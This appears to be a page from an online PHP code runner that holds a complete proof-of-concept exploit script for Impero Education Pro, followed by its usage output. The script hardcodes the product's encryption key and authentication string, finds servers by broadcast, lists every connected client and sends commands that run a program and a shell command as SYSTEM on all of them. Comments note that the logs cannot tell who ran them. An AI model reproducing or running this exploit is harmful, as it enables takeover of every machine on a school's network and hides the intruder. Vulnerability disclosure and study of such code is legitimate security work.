
run code in 300+ PHP versions simultaneously
<?php // Impero Education Pro SYSTEM-RCE PoC // by slipstream/RoL^LHQ // greets to everyone in lizardhq! :) function PadString($str) { $size = 16; $pad = $size - (strlen($str) % $size); $padstr = ''; for ($i = 1; $i < $pad; $i++) $padstr .= chr(mt_rand(0,255)); return $str.$padstr.chr($pad); } function UnPadString($str) { return substr($str,0,-(ord(substr($str,-1)))); } function CryptString($str) { $hash = hash('sha512','Imp3ro',true); $key = substr($hash,0,0x20); $iv = substr($hash,0x20,0x10); $crypted = mcrypt_encrypt(MCRYPT_RIJNDAEL_128,$key,PadString($str),'cbc',$iv); return $crypted; } function DecryptString($str) { $hash = hash('sha512','Imp3ro',true); $key = substr($hash,0,0x20); $iv = substr($hash,0x20,0x10); return UnPadString(mcrypt_decrypt(MCRYPT_RIJNDAEL_128,$key,$str,'cbc',$iv)); } function SendNetwork($h,$str) { global $socketid; $crypted = CryptString($socketid."|".$str); socket_write($h,strlen($crypted).'|'.$crypted); return; } function RecvNetwork($h) { $len = ''; $chr = ''; do { $len .= $chr; $chr = socket_read($h,1); } while ($chr != '|'); $len = (int)($len); if ($len < 1) die("Something's wrong. Length isn't an int."); socket_set_block($h); $crypted = socket_read($h,$len); $dec = DecryptString($crypted); global $socketid; $dec = explode('|',$dec,2); if ($socketid == -1) $socketid = $dec[0]; return $dec[1]; } function Connect($host,$port = 30015) { echo "Connecting..."; $h = socket_create(AF_INET,SOCK_STREAM,SOL_TCP); socket_set_block($h); if ((!$h) || (!socket_connect($h,$host,$port))) { echo "failed.\n"; return false; } echo "done!\nAuthenticating..."; // authenticate SendNetwork($h,"AUTHENTICATE\x02PASSWORD"); echo "done!\nWaiting for response..."; // we should get "AUTH:OK" back $data = RecvNetwork($h); if ($data != "AUTH:OK") { echo "authentication failed.\n"; return false; } echo "authentication succeeded!\nNegotiating..."; SendNetwork($h,"PING1\x02IE11WIN7\x03\x035003\x019f579e0f20cb18c8bc1ee4f2dc5d9aeb\x01c0d3fd41a05add5e6d7c8b64924bef86\x018dc3a6ceec8a51e1fd2e7e688db44417\x01d1554e349fc677e6011309683ac1b85b\x012b94f70093e484b8fc7f62a4670377ea"); // we get sent 4 loads of packets. discard all. for ($i = 0; $i < 4; $i++) { RecvNetwork($h); usleep(500000); } //SendNetwork($h,"-1|ANNOUNCE\x01600\x012\x01-1\x02IE11WIN7\x03IEUser\x03\x031\x03\x030\x031\x036\x0308:00:27:85:C5:CD,08:00:27:D0:C2:E1\x0310.0.2.15,\x035003\x032015-06-11 12:17:19\x0310.0.2.255,\x03None,Everyone,Users,INTERACTIVE,CONSOLE LOGON,Authenticated Users,This Organization,Local account,LOCAL,NTLM Authentication\x035003\x032.0.50727.5485\x03IE11WIN7\x03NODOMAIN"); echo "done!\n"; return $h; } function GetAllClients($h) { $pline = "SENDCLIENTS\x01604\x011\x010\x02"; echo "Getting all clients..."; SendNetwork($h,$pline); $data = RecvNetwork($h); // grab the base64 blob $data = array_pop(explode("\x02",$data)); // unbase64 and uncompress $data = gzdecode(base64_decode($data)); $ret = array(); foreach (explode("\r\n",$data) as $line) { // we only care about clientIDs $ret[] = array_shift(explode("\x03",$line)); } echo "done!\n"; return $ret; } function RunCmd($h,$ids,$cmdline) { global $socketid; $ids = implode(',',$ids); $pline = "ECHO\x01\x01".$ids."\x01SENDCOMMANDMSG\x010\x02\x01\x01".$cmdline; echo "Sending evil RunCMD data..."; SendNetwork($h,$pline); echo "done!\n"; // if this was a real proper negoiated client we'd get something back // however, we aren't, and we're masquerading as client #0; thus, we don't. // this does show up in logs, with the executed command. however, the server doesn't know who ran it, so it shows up as "unknown". :) } function RunExeAsSystem($h,$ids,$exe) { global $socketid; $ids = implode(',',$ids); $pline = "ECHO\x01\x01".$ids."\x01OPENFILE\x010\x02".$exe."\x08\x08NT AUTHORITY\SYSTEM\x08Password"; echo "Sending evil RunEXE data..."; SendNetwork($h,$pline); echo "done!\n"; // we don't get a response from this one } function FindImperoServer($if,$addr) { $sock = socket_create(AF_INET, SOCK_DGRAM, SOL_UDP); socket_set_option($sock, SOL_SOCKET, SO_BROADCAST, 1); socket_set_option($sock,SOL_SOCKET,IP_MULTICAST_IF,$if); $str = "ARE_YOU_IMPERO_SERVER"; socket_sendto($sock, $str, strlen($str), MSG_DONTROUTE, $addr, 30016); socket_set_option($sock,SOL_SOCKET,SO_RCVTIMEO,array("sec"=>6,"usec"=>0)); $r = socket_recvfrom($sock, $buf, 18, 0, $remote_ip, $remote_port); if ($buf == "I_AM_IMPERO_SERVER") return $remote_ip; return false; } $socketid = -1; echo "[*] Impero Education Pro SYSTEM-RCE PoC by slipstream/RoL^LHQ\n"; if ($argc < 2) { echo "[-] Usage: ".$argv[0]." <serverIPs space-delimited>\n"; echo "[*] If you pass \"detect <if> <broadcastmask>\" (without quotes) as serverIP then we will try to find an impero server, using interface and broadcast mask given.\n"; echo "[*] Example of this: ".$argv[0]." detect vboxnet0\n"; echo "[*] This PoC will pop a calc and run whoami > C:\lol.txt as SYSTEM on *every connected client*!\n"; die(); } array_shift($argv); foreach ($argv as $key=>$arg) { $detected = false; if ($arg == "detect") { if ($key + 2 >= count($argv)) continue; echo "[*] Finding Impero server...\n"; $arg = FindImperoServer($argv[$key+1],$argv[$key+2]); if ($arg == false) die("[-] Cannot find Impero server\n"); echo "[+] Found Impero server at ".$arg."\n"; $detected = true; } $h = Connect($arg); if ($h === false) continue; $clients = GetAllClients($h); RunExeAsSystem($h,$clients,"calc"); RunCmd($h,$clients,"whoami > C:\lol.txt"); echo "\n"; if ($detected) die(); }
Output for 5.4.0 - 5.4.45, 5.5.0 - 5.5.38, 5.6.0 - 5.6.28, 7.0.0 - 7.0.20, 7.1.0 - 7.1.7
[*] Impero Education Pro SYSTEM-RCE PoC by slipstream/RoL^LHQ [-] Usage: /in/f2jt8 <serverIPs space-delimited> [*] If you pass "detect <if> <broadcastmask>" (without quotes) as serverIP then we will try to find an impero server, using interface and broadcast mask given. [*] Example of this: /in/f2jt8 detect vboxnet0 [*] This PoC will pop a calc and run whoami > C:\lol.txt as SYSTEM on *every connected client*!

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